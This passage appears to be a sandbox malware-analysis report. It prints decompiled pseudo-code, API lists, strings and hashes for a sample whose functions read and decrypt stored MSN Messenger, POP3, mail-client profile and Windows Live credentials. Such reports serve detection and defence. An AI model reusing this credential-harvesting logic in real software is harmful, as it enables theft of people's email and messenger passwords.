                                                                                • Opcode Fuzzy Hash: 37bb09f8b96ce6c60aa0d5a3bd89c5871ef181f1a1b83bd216632f6d31a5aab6
                                                                                • Instruction Fuzzy Hash: DA6178704083859FDB249F26948046BBBF1FB85315F54997FF5D2A22A1E738E8468B0B
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040D4A6(char* __ebx, void** _a4) {
                                                                                				int _v8;
                                                                                				int _v12;
                                                                                				int _v16;
                                                                                				void* _v20;
                                                                                				int _v24;
                                                                                				char* _v28;
                                                                                				char _v32;
                                                                                				char _v556;
                                                                                				char _v557;
                                                                                				char _v1578;
                                                                                				void _v1580;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				long _t39;
                                                                                				int _t43;
                                                                                				char _t48;
                                                                                				char* _t63;
                                                                                				int* _t67;
                                                                                
                                                                                				_t63 = __ebx;
                                                                                				_t67 = 0;
                                                                                				_v16 = 0;
                                                                                				_v12 = 0x400;
                                                                                				_t39 = RegQueryValueExA( *_a4, "Password.NET Messenger Service", 0, 0,  &_v1580,  &_v12);
                                                                                				if(_t39 != 0) {
                                                                                					L13:
                                                                                					RegCloseKey( *_a4);
                                                                                					return _v16;
                                                                                				}
                                                                                				_t43 = _t39 + 1;
                                                                                				if(_v12 <= _t43) {
                                                                                					goto L13;
                                                                                				}
                                                                                				_t74 = _v1580 - 0x20;
                                                                                				_v8 = 0;
                                                                                				if(_v1580 >= 0x20) {
                                                                                					_v8 = _t43;
                                                                                					L10:
                                                                                					if(_v8 != _t67) {
                                                                                						_v557 = 0;
                                                                                						E00401380( &_v1580,  &(_t63[0x100]), 0xff);
                                                                                						_v8 = 0xff;
                                                                                						_t48 = RegQueryValueExA( *_a4, "User.NET Messenger Service", 0, 0, _t63,  &_v8);
                                                                                						if(_t48 == 0) {
                                                                                							_t63[0xfe] = _t48;
                                                                                							_t63[0x1fe] = _t48;
                                                                                							_v16 = 1;
                                                                                						}
                                                                                					}
                                                                                					goto L13;
                                                                                				}
                                                                                				_t69 =  &_v556;
                                                                                				E004046D7( &_v556);
                                                                                				if(E004047A0(_t69, _t74) == 0) {
                                                                                					L8:
                                                                                					E004047F1( &_v556);
                                                                                					_t67 = 0;
                                                                                					goto L10;
                                                                                				}
                                                                                				_v32 = _v12 + 0xfffffffe;
                                                                                				_v28 =  &_v1578;
                                                                                				if(E00404811(_t69,  &_v32, 0,  &_v24) == 0) {
                                                                                					goto L8;
                                                                                				}
                                                                                				if(_v24 < 0x400) {
                                                                                					memcpy( &_v1580, _v20, _v24);
                                                                                					_v8 = 1;
                                                                                				}
                                                                                				LocalFree(_v20);
                                                                                				goto L8;
                                                                                			}






















                                                                                APIs
                                                                                • RegQueryValueExA.ADVAPI32(?,Password.NET Messenger Service,00000000,00000000,?,?,80000001,73AFF420), ref: 0040D4D5
                                                                                • RegQueryValueExA.ADVAPI32(?,User.NET Messenger Service,00000000,00000000,?,?), ref: 0040D5AA
                                                                                  • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                                  • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,73AFF420), ref: 004047A8
                                                                                  • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                                • memcpy.MSVCRT ref: 0040D546
                                                                                • LocalFree.KERNEL32(?,?,00000000,?), ref: 0040D558
                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040D5CC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: QueryValue$AddressCloseFreeLibraryLoadLocalProcmemcpystrcpy
                                                                                • String ID: $Password.NET Messenger Service$User.NET Messenger Service
                                                                                • API String ID: 3289975857-105384665
                                                                                • Opcode ID: d83e2ebe096d5bcd78dc6c5e473717e98c5fc49575dad68c24a229f0531786f0
                                                                                • Instruction ID: 7f1cec63b8765f81c3836bbc11e71f1516ceea0880c28a2d93855dc55ce36bd3
                                                                                • Opcode Fuzzy Hash: d83e2ebe096d5bcd78dc6c5e473717e98c5fc49575dad68c24a229f0531786f0
                                                                                • Instruction Fuzzy Hash: AE314DB1D01219AFDB11DF94CC44BDEBBB9AF48318F1040B6E905B7290D6789B94CF99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 89%
                                                                                			E0040706C(void* __ecx, intOrPtr* _a4, intOrPtr _a8, char _a12) {
                                                                                				char _v12;
                                                                                				short* _v16;
                                                                                				char _v20;
                                                                                				char* _v24;
                                                                                				char _v28;
                                                                                				char _v288;
                                                                                				char _v544;
                                                                                				char _v800;
                                                                                				char _v1056;
                                                                                				char _v1584;
                                                                                				void _v2607;
                                                                                				char _v2608;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* _t36;
                                                                                				void* _t63;
                                                                                				char* _t66;
                                                                                				void* _t68;
                                                                                
                                                                                				_t63 = __ecx;
                                                                                				_v2608 = 0;
                                                                                				memset( &_v2607, 0, 0x3ff);
                                                                                				_v12 = 0x400;
                                                                                				_v1056 = 0;
                                                                                				_v800 = 0;
                                                                                				_v544 = 0;
                                                                                				_v288 = 0;
                                                                                				_t36 = E0040EBA3(_t63, _a8, "POP3_credentials",  &_v2608,  &_v12);
                                                                                				_t72 = _t36;
                                                                                				if(_t36 != 0) {
                                                                                					return _t36;
                                                                                				}
                                                                                				_t67 =  &_v1584;
                                                                                				E004046D7( &_v1584);
                                                                                				if(E004047A0( &_v1584, _t72) != 0) {
                                                                                					_v24 =  &_v2608;
                                                                                					_v28 = _v12;
                                                                                					_t16 =  &_v20; // 0x407221
                                                                                					if(E00404811(_t67,  &_v28, 0, _t16) != 0) {
                                                                                						_t19 =  &_v20; // 0x407221
                                                                                						 *((char*)(_t68 + WideCharToMultiByte(0, 0, _v16,  *_t19 >> 1,  &_v544, 0xfd, 0, 0) - 0x21c)) = 0;
                                                                                						LocalFree(_v16);
                                                                                						E0040EB80(0xff, _t63, _a8, "POP3_name",  &_v800);
                                                                                						E0040EB80(0xff, _t63, _a8, "POP3_host",  &_v288);
                                                                                						_t28 =  &_a12; // 0x407221
                                                                                						_t66 =  &_v1056;
                                                                                						E004060D0(0xff, _t66,  *_t28);
                                                                                						 *((intOrPtr*)( *_a4))(_t66);
                                                                                					}
                                                                                				}
                                                                                				return E004047F1( &_v1584);
                                                                                			}























                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040708D
                                                                                  • Part of subcall function 0040EBA3: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,004024A0,?), ref: 0040EBB9
                                                                                  • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                                  • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,73AFF420), ref: 004047A8
                                                                                  • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,!r@,?,000000FD,00000000,00000000,?,00000000,!r@,?,?,?,?,00000000), ref: 00407128
                                                                                • LocalFree.KERNEL32(?,?,?,?,?,00000000,73AFED80,?), ref: 00407138
                                                                                  • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
                                                                                  • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                                                  • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWidememcpymemsetstrcpystrlen
                                                                                • String ID: !r@$!r@$POP3_credentials$POP3_host$POP3_name
                                                                                • API String ID: 604216836-250559020
                                                                                • Opcode ID: 88d4546f94300e18eb63e1a28018ddb3fc5fe9f294d301ab42fb72424ac45106
                                                                                • Instruction ID: f8ca724a3b3a12fba31c48434a973b8369f3aae8d57bdfed2f45406e53e98f37
                                                                                • Opcode Fuzzy Hash: 88d4546f94300e18eb63e1a28018ddb3fc5fe9f294d301ab42fb72424ac45106
                                                                                • Instruction Fuzzy Hash: C331707194021CAFDB11EB698C81ADE7BBCEF19344F0084B6FA05A2281D6389B598F65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 68%
                                                                                			E00405E46(long __edi, char* _a4) {
                                                                                				char _v8;
                                                                                				void* _t8;
                                                                                				void* _t10;
                                                                                				long _t14;
                                                                                				long _t24;
                                                                                
                                                                                				_t24 = __edi;
                                                                                				_t1 = _t24 - 0x834; // -2100
                                                                                				_t8 = 0;
                                                                                				_t14 = 0x1100;
                                                                                				if(_t1 <= 0x383) {
                                                                                					_t8 = LoadLibraryExA("netmsg.dll", 0, 2);
                                                                                					if(0 != 0) {
                                                                                						_t14 = 0x1900;
                                                                                					}
                                                                                				}
                                                                                				if(FormatMessageA(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
                                                                                					_t10 = strcpy(_a4, "Unknown Error");
                                                                                				} else {
                                                                                					if(strlen(_v8) < 0x400) {
                                                                                						strcpy(_a4, _v8);
                                                                                					}
                                                                                					_t10 = LocalFree(_v8);
                                                                                				}
                                                                                				return _t10;
                                                                                			}









                                                                                APIs
                                                                                • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00405F65,?,?), ref: 00405E6B
                                                                                • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,?,00000000,?,?,00405F65,?,?), ref: 00405E89
                                                                                • strlen.MSVCRT ref: 00405E96
                                                                                • strcpy.MSVCRT(?,?,?,?,00405F65,?,?), ref: 00405EA6
                                                                                • LocalFree.KERNEL32(?,?,?,00405F65,?,?), ref: 00405EB0
                                                                                • strcpy.MSVCRT(?,Unknown Error,?,?,00405F65,?,?), ref: 00405EC0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strcpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                                                • String ID: Unknown Error$netmsg.dll
                                                                                • API String ID: 3198317522-572158859
                                                                                • Opcode ID: be691a346cef5d5e24c515aac1ca35402bb88184c6041fe02f13b1b1e364655c
                                                                                • Instruction ID: 3a45a8761f4bc18c8cc8ce1e33cdf84813ecacbbbbff7bb38409c5e389e3efd7
                                                                                • Opcode Fuzzy Hash: be691a346cef5d5e24c515aac1ca35402bb88184c6041fe02f13b1b1e364655c
                                                                                • Instruction Fuzzy Hash: A901B131604118BAE7155B61ED46EDF7E6DDB14792B20443AF602F00A0DA785F409A98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 92%
                                                                                			E0040875C(void* __eax, void* __eflags, signed int _a4, short _a8) {
                                                                                				char _v8;
                                                                                				signed int _v12;
                                                                                				signed int _v16;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed int _t96;
                                                                                				signed int _t98;
                                                                                				void* _t99;
                                                                                				signed int _t104;
                                                                                				signed short _t107;
                                                                                				signed int _t110;
                                                                                				intOrPtr _t114;
                                                                                				signed int _t117;
                                                                                				signed int _t119;
                                                                                				signed short _t121;
                                                                                				signed int _t122;
                                                                                				signed int _t152;
                                                                                				signed int _t156;
                                                                                				signed int _t158;
                                                                                				signed int _t161;
                                                                                				signed int _t163;
                                                                                				signed int _t168;
                                                                                				signed int _t169;
                                                                                				signed int _t170;
                                                                                				void* _t172;
                                                                                				void* _t173;
                                                                                				void* _t174;
                                                                                				void* _t178;
                                                                                				intOrPtr _t180;
                                                                                
                                                                                				_t174 = __eflags;
                                                                                				_t172 = __eax;
                                                                                				E00408572(__eax);
                                                                                				 *(_t172 + 0x2c) =  *(_t172 + 0x2c) & 0x00000000;
                                                                                				_t122 = 0xd;
                                                                                				 *((intOrPtr*)(_t172 + 0x184)) = _a4;
                                                                                				_t156 = 0x14;
                                                                                				_t96 = _t122 * _t156;
                                                                                				 *(_t172 + 0x1b0) = _t122;
                                                                                				_push( ~(0 | _t174 > 0x00000000) | _t96);
                                                                                				L004115D0();
                                                                                				 *(_t172 + 0x1b4) = _t96;
                                                                                				_t158 = 0x10;
                                                                                				_t98 = _t122 * _t158;
                                                                                				_push( ~(0 | _t174 > 0x00000000) | _t98);
                                                                                				L004115D0();
                                                                                				 *(_t172 + 0x34) = _t98;
                                                                                				_v8 = 0x4168e0;
                                                                                				do {
                                                                                					_t21 =  &_v8; // 0x4168e0
                                                                                					_t99 =  *_t21;
                                                                                					_t168 =  *_t99;
                                                                                					_v12 = _t168;
                                                                                					_t169 = _t168 * 0x14;
                                                                                					memcpy( *(_t172 + 0x1b4) + _t169, _t99, 0x14);
                                                                                					_t24 =  &_v8; // 0x4168e0
                                                                                					_t104 = _v12 << 4;
                                                                                					_v12 = _t104;
                                                                                					memcpy( *(_t172 + 0x34) + _t104,  *_t24 + 0x14, 0x10);
                                                                                					_t107 =  *(_t169 +  *(_t172 + 0x1b4) + 0x10);
                                                                                					_t173 = _t173 + 0x18;
                                                                                					_v16 = _t107;
                                                                                					 *((intOrPtr*)( *(_t172 + 0x34) + _v12 + 0xc)) = _t107;
                                                                                					if((_t107 & 0xffff0000) == 0) {
                                                                                						 *(_t169 +  *(_t172 + 0x1b4) + 0x10) = E004078FF(_t107 & 0x0000ffff);
                                                                                						_t121 = E004078FF(_v16 | 0x00010000);
                                                                                						 *( *(_t172 + 0x34) + _v12 + 0xc) = _t121;
                                                                                						_t122 = 0xd;
                                                                                					}
                                                                                					_v8 = _v8 + 0x24;
                                                                                					_t178 = _v8 - 0x416ab4;
                                                                                				} while (_t178 < 0);
                                                                                				 *(_t172 + 0x38) =  *(_t172 + 0x38) & 0x00000000;
                                                                                				 *((intOrPtr*)(_t172 + 0x3c)) = _a8;
                                                                                				_t161 = 4;
                                                                                				_t110 = _t122 * _t161;
                                                                                				 *(_t172 + 0x20) = _t122;
                                                                                				 *((intOrPtr*)(_t172 + 0x1c)) = 0x20;
                                                                                				_push( ~(0 | _t178 > 0x00000000) | _t110);
                                                                                				L004115D0();
                                                                                				_push(0xc);
                                                                                				 *(_t172 + 0x24) = _t110;
                                                                                				L004115D0();
                                                                                				_t170 = _t110;
                                                                                				if(_t170 == 0) {
                                                                                					_t170 = 0;
                                                                                					__eflags = 0;
                                                                                				} else {
                                                                                					_t114 =  *((intOrPtr*)(_t172 + 0x48));
                                                                                					_t180 = _t114;
                                                                                					_a8 = _t114;
                                                                                					if(_t180 == 0) {
                                                                                						_a8 = 0x64;
                                                                                					}
                                                                                					 *((intOrPtr*)(_t170 + 8)) = _a4;
                                                                                					_t163 = 4;
                                                                                					_t117 = _t122 * _t163;
                                                                                					 *(_t170 + 4) = _t122;
                                                                                					_push( ~(0 | _t180 > 0x00000000) | _t117);
                                                                                					L004115D0();
                                                                                					_a4 = _a4 & 0x00000000;
                                                                                					 *_t170 = _t117;
                                                                                					do {
                                                                                						_t152 = _a4;
                                                                                						_t119 = _t152 << 2;
                                                                                						_a4 = _a4 + 1;
                                                                                						 *( *_t170 + _t119 + 2) = _t152;
                                                                                						 *((short*)(_t119 +  *_t170)) = _a8;
                                                                                					} while (_a4 < _t122);
                                                                                				}
                                                                                				 *(_t172 + 0x19c) =  *(_t172 + 0x19c) & 0x00000000;
                                                                                				 *(_t172 + 0x1a0) = _t170;
                                                                                				 *((intOrPtr*)(_t172 + 0x40)) = 1;
                                                                                				 *((intOrPtr*)(_t172 + 0x198)) = 1;
                                                                                				 *((intOrPtr*)(_t172 + 0x1a4)) = 1;
                                                                                				 *((intOrPtr*)(_t172 + 0x1a8)) = 1;
                                                                                				 *((intOrPtr*)(_t172 + 0x1c4)) = 0x32;
                                                                                				return E004086DC(_t172);
                                                                                			}

                                                                                APIs
                                                                                  • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040857E
                                                                                  • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040858C
                                                                                  • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040859D
                                                                                  • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085B4
                                                                                  • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085BD
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00408793
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 004087AF
                                                                                • memcpy.MSVCRT ref: 004087D7
                                                                                • memcpy.MSVCRT ref: 004087F4
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040887D
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00408887
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 004088BF
                                                                                  • Part of subcall function 004078FF: LoadStringA.USER32 ref: 004079C8
                                                                                  • Part of subcall function 004078FF: memcpy.MSVCRT ref: 00407A07
                                                                                  • Part of subcall function 004078FF: strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,73B74DE0), ref: 0040797A
                                                                                  • Part of subcall function 004078FF: strlen.MSVCRT ref: 00407998
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ??2@??3@$memcpy$LoadStringstrcpystrlen
                                                                                • String ID: d$hA
                                                                                • API String ID: 3781940870-4030989184
                                                                                • Opcode ID: 6c64bdb5196202114d018d6502db394b3a43eca9dd46e983fc9d5c63418de248
                                                                                • Instruction ID: 2ee817cab8fb9d662dc1fdc17dcda2a390100e1008d8253a008a3d74f0a2914d
                                                                                • Opcode Fuzzy Hash: 6c64bdb5196202114d018d6502db394b3a43eca9dd46e983fc9d5c63418de248
                                                                                • Instruction Fuzzy Hash: 76518D72A01704AFDB24DF2AC582B9AB7E5FF48354F10852EE54ADB391EB74E940CB44
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 67%
                                                                                			E0040314D(void* __eax, intOrPtr _a4, char* _a8) {
                                                                                				signed int _v8;
                                                                                				intOrPtr _v12;
                                                                                				char _v188;
                                                                                				char _v268;
                                                                                				char _v524;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				char* _t53;
                                                                                				void* _t60;
                                                                                				void* _t65;
                                                                                				char* _t70;
                                                                                
                                                                                				_v8 = _v8 & 0x00000000;
                                                                                				_t65 = __eax;
                                                                                				 *((intOrPtr*)(__eax + 0x8c)) = 3;
                                                                                				 *((intOrPtr*)(__eax + 0x210)) = 1;
                                                                                				E0040311F(_a4, "UsesIMAP",  &_v524, 0xff, _a8);
                                                                                				if(_v524 == 0x31) {
                                                                                					 *((intOrPtr*)(_t65 + 0x210)) = 2;
                                                                                				}
                                                                                				_v12 = _t65 + 0x110;
                                                                                				E0040311F(_a4, "PopServer", _t65 + 0x110, 0x7f, _a8);
                                                                                				_t70 = _t65 + 0x214;
                                                                                				E0040311F(_a4, "LoginName", _t70, 0x7f, _a8);
                                                                                				E0040311F(_a4, "RealName", _t65 + 0xc, 0x7f, _a8);
                                                                                				E0040311F(_a4, "ReturnAddress", _t65 + 0x90, 0x7f, _a8);
                                                                                				E0040311F(_a4, "SavePasswordText",  &_v268, 0xff, _a8);
                                                                                				if(_v268 != 0) {
                                                                                					_v188 = 0;
                                                                                					E00401D5A( &_v268, _t65 + 0x294);
                                                                                					if( *_t70 == 0) {
                                                                                						_push(_a8);
                                                                                						_t60 = 0x7f;
                                                                                						_push(_t60);
                                                                                						_push(_t70);
                                                                                						_push("PopAccount");
                                                                                						_push(_a4);
                                                                                						E0040311F();
                                                                                						if( *_t70 != 0) {
                                                                                							_t53 = strchr(_t70, 0x40);
                                                                                							_a8 = _t53;
                                                                                							if(_t53 != 0) {
                                                                                								E004060D0(_t60, _v12,  &(_t53[1]));
                                                                                								 *_a8 = 0;
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					_v8 = 1;
                                                                                				}
                                                                                				if( *_t70 != 0) {
                                                                                					_v8 = 1;
                                                                                				}
                                                                                				return _v8;
                                                                                			}

                                                                                APIs
                                                                                  • Part of subcall function 0040311F: GetPrivateProfileStringA.KERNEL32(00000000,?,Function_00012466,?,?,?), ref: 00403143
                                                                                • strchr.MSVCRT ref: 00403262
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: PrivateProfileStringstrchr
                                                                                • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                • API String ID: 1348940319-1729847305
                                                                                • Opcode ID: cc26f5bc1b7aaf2e570deba64efa3e2944f8347bda1c61efbd6a62b24a137412
                                                                                • Instruction ID: 1cfb9ddeec5dd782170234712f417fe000b4b626ad5f21becf6162a2306db812
                                                                                • Opcode Fuzzy Hash: cc26f5bc1b7aaf2e570deba64efa3e2944f8347bda1c61efbd6a62b24a137412
                                                                                • Instruction Fuzzy Hash: 7631B370A04209BEEF119F20CC06FD97F6CAF14318F10816AF95C7A1D2C7B95B958B54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 16%
                                                                                			E0040F09D(char* __eax, void* __ecx) {
                                                                                				void* _t2;
                                                                                				char* _t3;
                                                                                				void* _t5;
                                                                                				void* _t6;
                                                                                				void* _t7;
                                                                                
                                                                                				_t3 = __eax;
                                                                                				_t6 = __ecx;
                                                                                				_t5 = 4;
                                                                                				while(1) {
                                                                                					_t2 =  *_t3;
                                                                                					if(_t2 != 0x3c) {
                                                                                						goto L3;
                                                                                					}
                                                                                					_push(_t5);
                                                                                					_push("&lt;");
                                                                                					L14:
                                                                                					_t2 = memcpy(_t6, ??, ??);
                                                                                					_t7 = _t7 + 0xc;
                                                                                					_t6 = _t6 + _t5;
                                                                                					L16:
                                                                                					if( *_t3 != 0) {
                                                                                						_t3 = _t3 + 1;
                                                                                						continue;
                                                                                					}
                                                                                					return _t2;
                                                                                					L3:
                                                                                					if(_t2 != 0x3e) {
                                                                                						if(_t2 != 0x22) {
                                                                                							if(_t2 != 0xb0) {
                                                                                								if(_t2 != 0x26) {
                                                                                									if(_t2 != 0xa) {
                                                                                										 *_t6 = _t2;
                                                                                										_t6 = _t6 + 1;
                                                                                									} else {
                                                                                										_push(_t5);
                                                                                										_push("<br>");
                                                                                										goto L14;
                                                                                									}
                                                                                								} else {
                                                                                									_push(5);
                                                                                									_push("&amp;");
                                                                                									goto L11;
                                                                                								}
                                                                                							} else {
                                                                                								_push(5);
                                                                                								_push("&deg;");
                                                                                								L11:
                                                                                								_t2 = memcpy(_t6, ??, ??);
                                                                                								_t7 = _t7 + 0xc;
                                                                                								_t6 = _t6 + 5;
                                                                                							}
                                                                                						} else {
                                                                                							_t2 = memcpy(_t6, "&quot;", 6);
                                                                                							_t7 = _t7 + 0xc;
                                                                                							_t6 = _t6 + 6;
                                                                                						}
                                                                                					} else {
                                                                                						_push(_t5);
                                                                                						_push("&gt;");
                                                                                						goto L14;
                                                                                					}
                                                                                					goto L16;
                                                                                				}
                                                                                			}









                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                • API String ID: 3510742995-3273207271
                                                                                • Opcode ID: eb0853a178c78b5e5dae4962a3b0185fc54ec5424429a466571b96bdadbff949
                                                                                • Instruction ID: 3259d816fa1e591736f6461b451ad75962e4f861ee845343ab42ffe8f3feec31
                                                                                • Opcode Fuzzy Hash: eb0853a178c78b5e5dae4962a3b0185fc54ec5424429a466571b96bdadbff949
                                                                                • Instruction Fuzzy Hash: 450171B2E852A4B5DA350905AC07FA70B865BA6B11F350037F58639AC2E1AD0D8F516F
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 69%
                                                                                			E0040D865(intOrPtr* _a4) {
                                                                                				char _v260;
                                                                                				char _v516;
                                                                                				void _v771;
                                                                                				char _v772;
                                                                                				intOrPtr _v776;
                                                                                				intOrPtr _v780;
                                                                                				intOrPtr _v788;
                                                                                				int _v796;
                                                                                				char _v800;
                                                                                				signed int _v804;
                                                                                				char _v808;
                                                                                				char _v812;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				intOrPtr* _t52;
                                                                                				void* _t53;
                                                                                				void* _t57;
                                                                                				signed int _t58;
                                                                                				char* _t65;
                                                                                				unsigned int _t68;
                                                                                				intOrPtr _t69;
                                                                                				void* _t85;
                                                                                				char* _t89;
                                                                                				intOrPtr _t92;
                                                                                				intOrPtr* _t93;
                                                                                				signed int _t94;
                                                                                				void* _t96;
                                                                                
                                                                                				_t52 = _a4;
                                                                                				_t96 = (_t94 & 0xfffffff8) - 0x32c;
                                                                                				_push(_t85);
                                                                                				 *((intOrPtr*)(_t52 + 4)) = 0;
                                                                                				 *((intOrPtr*)(_t52 + 8)) = 0;
                                                                                				_t89 = 0;
                                                                                				_t53 = E00406278();
                                                                                				_t97 =  *((intOrPtr*)(_t53 + 4)) - 5;
                                                                                				if( *((intOrPtr*)(_t53 + 4)) > 5) {
                                                                                					_t89 = L"WindowsLive:name=*";
                                                                                				}
                                                                                				_v800 = 0;
                                                                                				_v796 = 0;
                                                                                				if(E00404647( &_v800, _t85, _t97) == 0) {
                                                                                					L21:
                                                                                					return E004046C2( &_v800);
                                                                                				}
                                                                                				_v808 = 0;
                                                                                				_v812 = 0;
                                                                                				if(_v780 == 0) {
                                                                                					_t57 = 0;
                                                                                					__eflags = 0;
                                                                                				} else {
                                                                                					_t57 = _v776(_t89, 0,  &_v812,  &_v808);
                                                                                				}
                                                                                				if(_t57 == 0) {
                                                                                					goto L21;
                                                                                				} else {
                                                                                					_t58 = 0;
                                                                                					_v804 = 0;
                                                                                					if(_v812 <= 0) {
                                                                                						L20:
                                                                                						_v788(_v808);
                                                                                						goto L21;
                                                                                					} else {
                                                                                						do {
                                                                                							_t92 =  *((intOrPtr*)(_v808 + _t58 * 4));
                                                                                							if( *((intOrPtr*)(_t92 + 4)) == 1 &&  *(_t92 + 8) != 0 &&  *(_t92 + 0x30) != 0) {
                                                                                								_v772 = 0;
                                                                                								memset( &_v771, 0, 0xff);
                                                                                								_t96 = _t96 + 0xc;
                                                                                								if(WideCharToMultiByte(0, 0,  *(_t92 + 8), 0xffffffff,  &_v772, 0xff, 0, 0) > 0) {
                                                                                									_push(0x11);
                                                                                									_t65 =  &_v772;
                                                                                									_push("windowslive:name=");
                                                                                									_push(_t65);
                                                                                									L00411612();
                                                                                									_t96 = _t96 + 0xc;
                                                                                									if(_t65 == 0) {
                                                                                										_v516 = 0;
                                                                                										_v260 = 0;
                                                                                										WideCharToMultiByte(0, 0,  *(_t92 + 0x30), 0xffffffff,  &_v516, 0xff, 0, 0);
                                                                                										_t68 =  *(_t92 + 0x18);
                                                                                										if(_t68 > 0) {
                                                                                											WideCharToMultiByte(0, 0,  *(_t92 + 0x1c), _t68 >> 1,  &_v260, 0xff, 0, 0);
                                                                                											 *((char*)(_t96 + ( *(_t92 + 0x18) >> 1) + 0x238)) = 0;
                                                                                										}
                                                                                										if(_v260 == 0) {
                                                                                											_t69 = _a4;
                                                                                											_t44 = _t69 + 8;
                                                                                											 *_t44 =  *((intOrPtr*)(_t69 + 8)) + 1;
                                                                                											__eflags =  *_t44;
                                                                                										} else {
                                                                                											_t93 = _a4;
                                                                                											 *((intOrPtr*)( *_t93 + 4))( &_v516);
                                                                                											 *((intOrPtr*)(_t93 + 4)) =  *((intOrPtr*)(_t93 + 4)) + 1;
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                							_t58 = _v804 + 1;
                                                                                							_v804 = _t58;
                                                                                						} while (_t58 < _v812);
                                                                                						goto L20;
                                                                                					}
                                                                                				}
                                                                                			}































                                                                                APIs
                                                                                  • Part of subcall function 00406278: GetVersionExA.KERNEL32(00417118,0000001A,0040EE77,00000104), ref: 00406292
                                                                                • memset.MSVCRT ref: 0040D917
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040D92E
                                                                                • _strnicmp.MSVCRT ref: 0040D948
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040D974
